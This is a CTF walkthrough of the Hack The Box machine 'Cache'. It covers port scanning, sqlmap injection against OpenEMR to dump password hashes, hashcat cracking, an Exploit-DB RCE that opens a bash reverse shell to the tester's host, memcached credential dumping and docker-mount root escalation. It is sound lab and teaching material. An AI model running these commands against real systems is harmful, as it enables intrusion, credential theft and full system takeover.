This is an interesting machine, it is rated as medium difficulty, there are a few techniques such as sql injection, memcache enumeration and docker privilege escalation. I have learned memcache and docker privesc from this machine and deepened my familiarity with sqlmap, sqlmap in my opinion is the most difficult technique as there are a lot of syntax to use for test luckily I got sqlmap else enumeration with sql injection is a pain in the neck and consumed more time than usual.
After I have got the root of this machine I realize Linux is as secured as the administrator who configures it, misconfiguration leads to privilege escalation in a command away.
This section takes up the most time.
Ignore those filtered ports, I only need to enumerate web service (http, tcp/80), usually htb machine will not be doing ssh bruteforcing so do not waste time on ssh.
# Nmap 7.80 scan initiated Mon May 11 09:11:53 2020 as: nmap -sV -sC -T4 -p- -oN cache -vvv 10.10.10.188 Warning: 10.10.10.188 giving up on port because retransmission cap hit (6). Nmap scan report for cache.htb (10.10.10.188) Host is up, received syn-ack (0.18s latency). Scanned at 2020-05-11 09:11:53 +08 for 1052s Not shown: 65511 closed ports Reason: 65511 conn-refused PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCb3lyySrN6q6RWe0mdRQOvx8TgDiFAVhicR1h3UlBANr7ElILe7ex89jpzZSkhrYgCF7iArq7PFSX+VY52jRupsYJp7V2XLY9TZOq6F7u6eqsRA60UVeqkh+WnTE1D1GtQSDM2693/1AAFcEMhcwp/Z7nscp+PY1npxEEP6HoCHnf4h4p8RccQuk4AdUDWZo7WlT4fpW1oJCDbt+AOU5ylGUW56n4uSUG8YQVP5WqSspr6IY/GssEw3pGvRLnoJfHjARoT93Fr0u+eSs8zWhpHRWkTEWGhWIt9pPI/pAx2eAeeS0L5knZrHppoOjhR/Io+m0i1kF1MthV+qYjDjscf | 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFAHWTqc7a2Az0RjFRBeGhfQkpQrBmEcMntikVFn2frnNPZklPdV7RCy2VW7Ae+LnyJU4Nq2LYqp2zfps+BZ3H4= | 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMnbsx7/pCTUKU7WwHrL/d0YS9c99tRraIPvg5zrRpiF 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-title: Cache 324/tcp filtered rpki-rtr-tls no-response 2315/tcp filtered precise-sft no-response 2551/tcp filtered isg-uda-server no-response 4562/tcp filtered unknown no-response 11282/tcp filtered unknown no-response 12223/tcp filtered unknown no-response 13789/tcp filtered unknown no-response 17510/tcp filtered unknown no-response 20397/tcp filtered unknown no-response 24176/tcp filtered unknown no-response 26656/tcp filtered unknown no-response 30010/tcp filtered unknown no-response 32108/tcp filtered unknown no-response 32745/tcp filtered unknown no-response 39491/tcp filtered unknown no-response 41398/tcp filtered unknown no-response 42644/tcp filtered unknown no-response 46666/tcp filtered unknown no-response 49454/tcp filtered unknown no-response 58016/tcp filtered unknown no-response 62314/tcp filtered unknown no-response 63905/tcp filtered unknown no-response Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 11 09:29:25 2020 -- 1 IP address (1 host up) scanned in 1052.35 seconds
By opening the browser with http://10.10.10.188 the page looks like this
This page seems to be dynamic, but it has no functionality. I can submit whatever I want but nothing will happen, checking the source code the submit button leads to nowhere.
From the source code the entire form leads to nowhere and hence is a rabbit hole.
The author page gives the first clue about the web.
The page says this:
Check out his other projects like Cache:
HMS(Hospital Management System)
Check out the functionality.js
There is nothing after login
At first impression I thought this might be a steganographic puzzle, but it is a rabbit hole.
Get the Hospital Management System
On the first clue, it says there is a HMS like Cache, so by an educated guess I insert
10.10.10.188 hms.htb into
I spent a lot of time doing directories and files enumeration with dirbuster, nikto and burpsuite. I found a lot of directories and all can do listing:
/images (Status: 301)
/modules (Status: 301)
/common (Status: 301)
/library (Status: 301)
/public (Status: 301)
/portal (Status: 301)
/tests (Status: 301)
/sites (Status: 301)
/services (Status: 301)
/custom (Status: 301)
/contrib (Status: 301)
/templates (Status: 301)
/interface (Status: 301)
/vendor (Status: 301)
/config (Status: 301)
/Documentation (Status: 301)
/sql (Status: 301)
/ci (Status: 301)
/LICENSE (Status: 200)
/cloud (Status: 301)
/ccr (Status: 301)
/patients (Status: 301)
/repositories (Status: 301)
/myportal (Status: 301)
/entities (Status: 301)
/controllers (Status: 301)
/server-status (Status: 403)
From nikto I have these:
cyruslab@kali:~/htb/cache$ nikto -host hms.htb
- Nikto v2.1.6
+ Target IP: 10.10.10.188
+ Target Hostname: hms.htb
+ Target Port: 80
+ Start Time: 2020-05-11 12:02:24 (GMT8)
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: interface/login/login.php?site=default
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-3268: /config/: Directory indexing found.
+ /config/: Configuration information may be available remotely.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /library/: Directory indexing found.
+ OSVDB-3092: /library/: This might be interesting...
+ OSVDB-3268: /public/: Directory indexing found.
+ OSVDB-3092: /public/: This might be interesting...
+ OSVDB-3268: /services/: Directory indexing found.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3268: /tests/: Directory indexing found.
+ OSVDB-3092: /tests/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /ci/: Directory indexing found.
+ OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
+ Cookie OpenEMR created without the httponly flag
+ OSVDB-3268: /sites/: Directory indexing found.
+ Cookie PHPSESSID created without the httponly flag
+ /composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ 7785 requests: 0 error(s) and 25 item(s) reported on remote host
+ End Time: 2020-05-11 12:31:04 (GMT8) (1720 seconds)
+ 1 host(s) tested
After searching the web I found this https://www.exploit-db.com/exploits/45161, the code has a comment which has a youtube video to demonstrate how to use sqlmap to do sql injection and use the exploit for openemr.
The same exploit can be found with
Sql injection with sqlmap
The video serves as a very good guide, but there is a document which documents the all the sqli vulnerabilities of openemr, thanks to reddit user
thenewbier for directing me to the document.
The below is the portal login page, to show the sql error, the portal page is always turned off but in fact after reset the portal will re-appear again which means the intended way should be to enable the portal. If the portal remains disable the injection with sqlmap will fail.
Machine resets go back to the original state.
- Click on register
- change the uri to /portal/add_edit_event_user.php?eid=1′
Then from register page change the uri
The proof of concept injection to review OS version is this:
Use burpsuite to capture the request and save to file
Save the request into a request file and remove the %27 and use sqlmap.
sqlmap -r emr.req --dbs --dbms=MySQL
the database is
Then enumerate the tables.
sqlmap -r emr.req -D openemr --tables
Get the dump of table
sqlmap -r emr.req -D openemr -T users_secure --dump
The username and password hash are enumerated.
Crack the openemr_admin password
the password hash has a salt which starts with $2a$, from this reference: https://hashcat.net/wiki/doku.php?id=example_hashes I need to use module number 3200 which is blowfish / bcrypt.
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt where hash is the password hash file.
The username is
openemr_admin and password is
Get the user flag
Referring to the remote code execution python code https://www.exploit-db.com/exploits/45161, this code has to be run by python2 and requires
requests module, if you are using kali linux 2020 and does not have the requests library and need to download with the pip2 you need to add these two lines to your
deb-src http://http.kali.org/kali kali main non-free contrib deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
apt update then
apt install python-pip, after that do
pip install requests.
nc -lvnp 133.
python openemr_rce.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.21/1337 0>&1'
Upon success I will get a shell.
Upgrade to interactive shell in order to switch user in interactive mode, read this guide: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
The username ash and password
H@v3_fun found in http://10.10.10.188/jquery/functionality.js can be used here to switch user to
To upgrade to interactive shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
- Press Ctrl-Z on your keyboard so that your current nc session moves to the background.
stty raw -echo
fg, which will bring back the shell in a weird fashion
reset, will restore your weird shell into normal
- Then choose
- Make adjustment to the shell
stty rows 35and
stty cols 190, this way when checking for
psyou will be able to see all the output untruncated.
su ash to switch to
Get the root flag
ash is not a sudoer, neither does this account have any suid enabled files, the way is to change user to
luffy which is a member of
There is a service in
netstat which normally a htb machine does not use.
ash does not have privilege to logon as mysql hence it is not possible to do any
mysqldump, besides the database might not even have other passwords except for
The only suspicious port is tcp/11211 which after researched I found this site: https://www.hackingarticles.in/penetration-testing-on-memcached-server/
telnet 127.0.0.1 11211
within the memcache server there is one slab active.
Enumerate the items
The slab id are all 1.
Then dump all contents of slab id 1
stats cachedump 1 0
I get everything but since I have already got the root, the useful things are
get user and
luffy password is
I can either ssh or switch user to luffy.
For docker privilege escalation read this https://fosterelli.co/privilege-escalation-via-docker.
In Cache there is a downloaded docker image
docker image ls
docker run -v /:/mnt/cache -ti ubuntu chroot /mnt/cache bash to launch the root shell.
docker run -v /:/mnt/cache -ti ubuntu, you will get a shell within docker ubuntu, then go to
/mnt/cache/root/ to read the